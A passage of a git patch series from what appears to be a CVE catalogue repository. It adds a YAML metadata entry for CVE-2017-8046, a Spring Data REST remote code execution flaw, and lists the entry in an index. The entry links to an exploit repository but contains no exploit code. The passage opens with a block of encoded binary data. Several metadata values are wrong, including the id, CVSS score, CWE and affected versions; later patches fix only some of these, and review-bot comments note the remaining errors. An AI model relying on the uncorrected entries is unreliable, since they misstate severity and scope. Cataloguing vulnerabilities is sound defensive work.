z9<)%VsNt#PbBH-=3AF9v)Vp$)Sv-Iysm%d)?R*GG`xY|2XAKgjm~I6~lEK&DOypL) zQ|&K?)jn(9sM)FL%8W{|;NXKUJuJH#Q$$yL4bg+hE=B@;FM5OT&de}a#Sh~#lpHg# z3-!s?xVz9eNP+VTB;Q|S6W>drX2UNouc+fp^Q|8&Sez}c_`PaqZ0xp1(aBb^0%(1b zjZzM4|DkqJgIRp2D#PD3J+Q!?d@ExB;B13bh@;D2CGs_gP~XZJji@`LwMb?)WNA9jJ%mzLyELm6!;IuJLwGhE4N&B{1%mB;nnp-< zYKPA(r+*LacwOA6-uH+<1%#UU|bs$|ra{PYK|_1tqYP2@3-jgdxBun!H0)ud=7ONTFq+C6_Tkllgws-A2rj z>H#zbNVh;9N#!o|8n^{3bgWn>9%Q1ffhL~Rh$*T1_Cn#has{F=afK6<6$F7&4AKzm zRDcwTStQV<5IA$zVSLydFy~dFHg?r;sa^^hGPDy7!Xos}CcG9{GgeYMW z*SbO4u3p*0xqAXHa?AQc7ly}mKe&0Gis6EBG;c$4$Z%d^g+;o%b7F?Oe=G&zew;QJ zHe>U3e$oG?Q2F3~CrEZ3FJ`@KTw7~Z6=`%u1o1$tx<0{v)MO;rwtZ!+R+1PC|y-AsroBMpFbba$g@N}tjZ5u?hc;7MHp@_-y^fN zWh|)AiQ>4^DtvPS)LFe+LFCTPp_<@5nD)+F^ppvcG>b$lt;kn4K3AGnrT3?bU11^J zfk=y%+&0lesFi9^)XTbjY2S~Xb;6;$HYX@HXc^*ydkZdrgF_hiU6akLveA4a$GC96 zp~mBYv^`r9)=@`zA*vZmI&X4fY!5|5Xx(^1$K#5iu)L4%l-?+1lg>ocV$(5bj-0dv zIpEHr;;iGOo&X!G(k!AGW4XtEsZ}sp7$Xf{bzN7;VL8PL(Q*-f+iR;E5Dlwg{5U_i zktFag2k{>WPvBCipa6o8&$QBfE8&9JPw<)DQ^ZlT@1!tll@i$)UgFveuCw<-XDb3I zhP_y8E#tMZw=LY*6NG)hkAH3g9Z)MZdD>6YUk-TRN}~&bX{Q0jnA&X+QQI%HfQ|+k z3$B5+LDs=qPQ)q)2$6`Y(9S$gU_mdrsFwmLAj1Nyh?YbZ{2tO!{IxF`2+N|yrIwbU z+4p_|UC}06q_P0lzZt~G4k`4EyG0wF3l<(;#6WHl>dRiw2thXm3{@`{FvEX#zc#-o|5s98zqZru#fuaiew&HI@LGQ9UqLwJT;_)vn_4WEuB6Pz$|y@^)*R!e$83(`(k=$)OYl zjMR*%*g~A8P#KS5Vrjq;OOF9(KPDFWxfFlrbmAiy?X&+1-$AS%IuX4EVsb@$-xwZ= zyw9bCu59Z`<`*o=vzRuQ@>;PB-)BCSeye$cmkk9pQM-eSoFBNK1th|&zh9x;Vw~s* zFh*TKkMlqT@1QM-dOaayJD7Fy=fs6|ytkS&5b^As4{YZfg_z#d6}?#on*b3b(GeI1 zFI9-)X4JT{#=VYJ)4}zUrd#gO>YA&i;lK`4qj%AuC7wA8Yk&6!9(Y(y#NQ8i)hVgxAHh346)< zl$+08&(HQ+=h$($6mqjy?4osi;U_|uvg{QMdj*lv+IS(%eX};bGwi-c1JlPPHS5l* ztq$U?*g10O9v$De&Idq%cvV7f;r9pYyQ`p?Q4Y?!R34kE6WB_U{qFndyDmZ%I_{}p z`aYLCUsQT$9)KFVSS_pVW#-wApr9##Rc+JR49RW%GU%*#vVAsCKrG|=EV3MNFa|@sIO)x#>ECa7j4)u>JX@R1*AC+z(jYvXlP(8ZL)m~xZyY2KN zp(rg!_^K89^Y$O9%0{t)+O~s>v5*Xl0yi$cDL&J#TJ#I^k<8VGq86sc1d0{Z-wh~Y z+n_c%;dWsd_3XYJ9gi{Ci6R=yztovfo9GEmpmLY%P7~>a;#?qey;4}X^?a!4fgQo# 
zlI3r`s~uSzMr2e|@xT3a;%PjIdv!lvA>HJ#k*$1^p14e8qFTFfyDOm+k~q`g4&o1Q z*te&lUz94^YM?lZ9fIB=Ix@@i0zFJ-J(=OxbS8TspoZ@d7$Tpn!;kFsT3EkyZAYY}^Xa_X5 zFB>RQ;t%Pyv0kbU^MzypWmB|I6I9_i?xbvnlp`?l{HORbk0Q@nC{c&Hd;v_IS~}sZ zlKL+yJ)Y5JBN6g%K9ivi3{Jy{$pR>3(U%gaAV{G4wiPbE81m(ew^q*6 zA9Gv8HeTtl(UmrLXDB^_D+h90W0!GEsj4}oPGc*NCW?0*KSQrShvd)4e=YnkBFTSV`yYtE25EnZ|A9FAdHSyr z|0-7dSH@q{o_{h*f2I!pYsNokKmSVjYl7iV0xRtA5dNBH_*4I%ea~Me>L24*g^>_{ zNB=LD>ffvU&*HyK)j!4ce_Q;o7VEz!{4!bpB-H=+2!FL)|2^iH>G~%I0_k^W=}%|( zFBa^-NBuHk|3n%84^e-yWdA+xmnr)vuJ3<=`xh4NzsLSEY5&AhBLB}O^w(Yf9s9?^ z`~NN5ztjJ Date: Mon, 10 Apr 2023 10:57:34 +0000 Subject: [PATCH 06/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring/2017/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring/2017/.keep diff --git a/cve/java-spring/2017/.keep b/cve/java-spring/2017/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 2df5fa1faf33a7e2d45cb3318f7c6b33731e01ea Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:58:50 +0000 Subject: [PATCH 07/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20ya?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/ya/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring/2017/ya/.keep diff --git a/cve/java-spring/2017/ya/.keep b/cve/java-spring/2017/ya/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 312ad7470cf0e0155458825ab8b5d6cee485f216 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 11:03:55 +0000 Subject: [PATCH 08/13] add cve-2017-8046 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 
Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/java-spring/2017/ya/.keep | 0 cve/java-spring/2017/ya/CVE-2017-8046.yaml | 21 +++++++++++++++++++++ 2 files changed, 21 insertions(+) delete mode 100644 cve/java-spring/2017/ya/.keep create mode 100644 cve/java-spring/2017/ya/CVE-2017-8046.yaml diff --git a/cve/java-spring/2017/ya/.keep b/cve/java-spring/2017/ya/.keep deleted file mode 100644 index e69de29b..00000000 diff --git a/cve/java-spring/2017/ya/CVE-2017-8046.yaml b/cve/java-spring/2017/ya/CVE-2017-8046.yaml new file mode 100644 index 00000000..0d9f4311 --- /dev/null +++ b/cve/java-spring/2017/ya/CVE-2017-8046.yaml @@ -0,0 +1,21 @@ +id: CVE-2020-5398 +source: + https://github.com/m3ssap0/spring-break_cve-2017-8046 +info: + name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。 + severity: high + description: | + 在2.5.12、2.6.7、3.0 RC3之前的Pivotal spring data rest版本、2.0.0M4之前的spring Boot版本以及Kay-RC3之前的spring data发布序列中,提交给spring data rest服务器的恶意PATCH请求可以使用特制的JSON数据来运行任意Java代码。 + scope-of-influence: + Pivotal spring data rest 2.5.x (<2.5.12) + spring Boot 2.0.x (<2.0.0) + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2017-8046 + cwe-id: CWE-494, CWE-79 + cnvd-id: None + kve-id: None + tags: cve2017, spring-framework, RFD \ No newline at end of file -- Gitee From e713b6dd40e55aa259f149d9824cf058101a18fc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 11:04:16 +0000 Subject: [PATCH 09/13] update cve/java-spring/2017/ya/CVE-2017-8046.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/java-spring/2017/ya/CVE-2017-8046.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
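Review bot: The `scope-of-influence` block in the new CVE-2017-8046.yaml contradicts the `description` a few lines above it: the description lists Spring Data REST before 2.5.12, 2.6.7 and 3.0 RC3, Spring Boot before 2.0.0M4 and the Spring Data release train before Kay-RC3, while the scope lists only `Pivotal spring data rest 2.5.x (<2.5.12)` and `spring Boot 2.0.x (<2.0.0)`, and the latter is self-contradictory (no 2.0.x release is below 2.0.0). I would replace the two scope lines with `Pivotal Spring Data REST 2.5.x (<2.5.12), 2.6.x (<2.6.7), 3.0.x (<3.0 RC3)` and `Spring Boot 2.0.x (<2.0.0M4); Spring Data release train Kay (<Kay-RC3)` so the affected-version list matches the entry's own description. The same two lines survive unchanged into the patch 13/13 hunk that edits this file, so that hunk does not fix it either. The `name` field also reads as a general description of the Spring framework rather than the vulnerability's name; if the schema expects a name there, something like `Spring Data REST malicious PATCH request remote code execution ('Spring Break')` would be more useful to a triager. The wrong `id`, CVSS and CWE values in this hunk are already corrected by patches 09/13 and 13/13 and are not re-raised here.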
diff --git a/cve/java-spring/2017/ya/CVE-2017-8046.yaml b/cve/java-spring/2017/ya/CVE-2017-8046.yaml index 0d9f4311..2bef8c65 100644 --- a/cve/java-spring/2017/ya/CVE-2017-8046.yaml +++ b/cve/java-spring/2017/ya/CVE-2017-8046.yaml @@ -1,4 +1,4 @@ -id: CVE-2020-5398 +id: CVE-2017-8046 source: https://github.com/m3ssap0/spring-break_cve-2017-8046 info: -- Gitee From 9586e76953c2d2274358378f3e61c576665e8b3e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 11:04:30 +0000 Subject: [PATCH 10/13] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/java-sp?= =?UTF-8?q?ring/2017/ya=20=E4=B8=BA=20cve/java-spring/2017/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/{ya => yaml}/CVE-2017-8046.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/java-spring/2017/{ya => yaml}/CVE-2017-8046.yaml (100%) diff --git a/cve/java-spring/2017/ya/CVE-2017-8046.yaml b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml similarity index 100% rename from cve/java-spring/2017/ya/CVE-2017-8046.yaml rename to cve/java-spring/2017/yaml/CVE-2017-8046.yaml -- Gitee From 4c6c7747ae3cc4f8be99e1f00e83a46fe4dd34f5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 11:07:25 +0000 Subject: [PATCH 11/13] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 211571f6..ece28b62 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -154,6 +154,7 @@ cve: redis: - CVE-2022-31144 java-spring: + - CVE-2017-8046 - CVE-2020-5398 - CVE-2022-22965 - CVE-2022-22963 -- Gitee From 41c13fb1dee8d6052ab579e25c645c030b1ede81 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Tue, 11 Apr 2023 09:02:45 +0000 Subject: [PATCH 12/13] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring/2017/CVE-2017-8046/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/CVE-2017-8046/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring/2017/CVE-2017-8046/.keep diff --git a/cve/java-spring/2017/CVE-2017-8046/.keep b/cve/java-spring/2017/CVE-2017-8046/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 7998f50dcc588686b627464ffc76ec64ea4b1d1c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Tue, 11 Apr 2023 09:12:54 +0000 Subject: [PATCH 13/13] update cve/java-spring/2017/yaml/CVE-2017-8046.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/java-spring/2017/yaml/CVE-2017-8046.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml index 2bef8c65..c6b5f608 100644 --- a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml +++ b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml @@ -12,10 +12,10 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 7.5 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2017-8046 - cwe-id: CWE-494, CWE-79 + cwe-id: CWE-20 cnvd-id: None kve-id: None - tags: cve2017, spring-framework, RFD \ No newline at end of file + tags: cve2017, spring-framework \ No newline at end of file -- Gitee
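Review bot: The new `tags: cve2017, spring-framework` line labels the entry with the Spring Framework, but the file's own `description` places the flaw in Spring Data REST (plus Spring Boot and the Spring Data release train), so the tag is imprecise if it is meant to name the affected component; `tags: cve2017, spring-data-rest` would match the description, unless `spring-framework` is deliberately used here as a product-family label shared with the other java-spring entries. Both sides of the hunk also end with `\ No newline at end of file`; since the commit already rewrites the last line, adding the trailing newline now would keep the YAML file POSIX-clean and stop this marker from appearing in every future diff of it. The corrected `CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` vector and the `cvss-score: 9.8` line are consistent with each other.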